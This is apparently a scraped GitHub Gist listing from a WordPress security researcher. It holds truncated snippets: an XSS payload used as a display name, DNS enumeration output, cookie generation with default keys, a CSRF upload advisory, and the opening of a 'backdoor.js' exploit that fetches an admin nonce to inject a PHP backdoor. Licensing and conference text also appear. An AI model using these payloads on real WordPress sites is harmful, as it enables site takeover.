Ryan Dewhurst ethicalhack3r

"><img src=x onerror=alert('Github @ethicalhack3r')><"
$ ./dnsrecon.py -d jamiehankins.co.uk
[*] Performing General Enumeration of Domain: jamiehankins.co.uk
[-] DNSSEC is not configured for jamiehankins.co.uk
[*] SOA hank.ns.cloudflare.com 173.245.59.116
[*] SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS hank.ns.cloudflare.com 173.245.59.116
[*] NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS lucy.ns.cloudflare.com 173.245.58.133
[*] NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85
[*] MX aspmx2.googlemail.com 74.125.143.27
ethicalhack3r / pluggable.php
Created November 18, 2014 15:41
WordPress authentication cookie generation using default keys
<?php
if ( !function_exists('wp_generate_auth_cookie') ) :
/**
* Generate authentication cookie contents.
*
* @since 2.5.0
*
* @param int $user_id User ID
* @param int $expiration Cookie expiration in seconds
ethicalhack3r / advisory
Created December 6, 2014 09:39
Satoshi v2.0 - CSRF
Theme Name: Satoshi v2.0
Theme URI: http://www.vooshthemes.com
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
Author: Voosh Themes
Author URI: http://www.vooshthemes.com
wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js
Localhost Demo:
http://theantisocialengineer.com/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=AAF49566F17ED862F20934A0501A97C9&r=0.5144356689415872
ethicalhack3r / license.txt
Created January 21, 2015 14:17
WPScan Public Source License
WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.
Definitions
“License” means this document.
“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
ethicalhack3r / post.txt
Created January 21, 2015 14:18
WPScan Licensing
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for
ethicalhack3r / backdoor.js
Last active May 3, 2023 16:53
wp backdoor exploit (injects a PHP backdoor)
var wpnonce = '';
function getCSRFNonce(callback)
{
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
xhr.withCredentials = true;
xhr.overrideMimeType('text/xml');
ethicalhack3r / chrome-uri.txt
Last active February 20, 2024 03:02
Chrome 'protocol handlers' extracted from Google Chrome browser source code (chromium-50.0.2624.0.tar.xz downloaded from https://gsdview.appspot.com/chromium-browser-official/). A lot will not work, some are probably from unit tests.
chrome://-alkuisissa
chrome://-nettadresser
chrome://-webbadresser
chrome://ChromeTestChromeWebUIControllerFactory
chrome://DummyURL
chrome://URLs
chrome://about
chrome://accessibility
chrome://anything
chrome://app-list
ethicalhack3r / euskalhack.md
Created February 29, 2016 15:36
[CFP] EuskalHack (San Sebastian / Donostia) 2016

Introduction

EuskalHack Security Congress is the first Ethical Hacking association in Euskadi, with the aim of promoting the community and culture in digital security to anyone who may be interested.

This exclusive conference is shaping up to be the most relevant in the Basque Country, with an estimated 125 attendees for the first edition.

The participants include specialised companies, state security organisations, professionals, hobbyists and students in the area of security and Information Technology.

Estimated date and location

ethicalhack3r / events.txt
Last active March 3, 2023 07:41
List of event attributes
loadedstart
onabort
onafterprint
onanimationend
onanimationiteration
onanimationstart
onautocomplete
onautocompleteerror
onbeforecopy
onbeforecut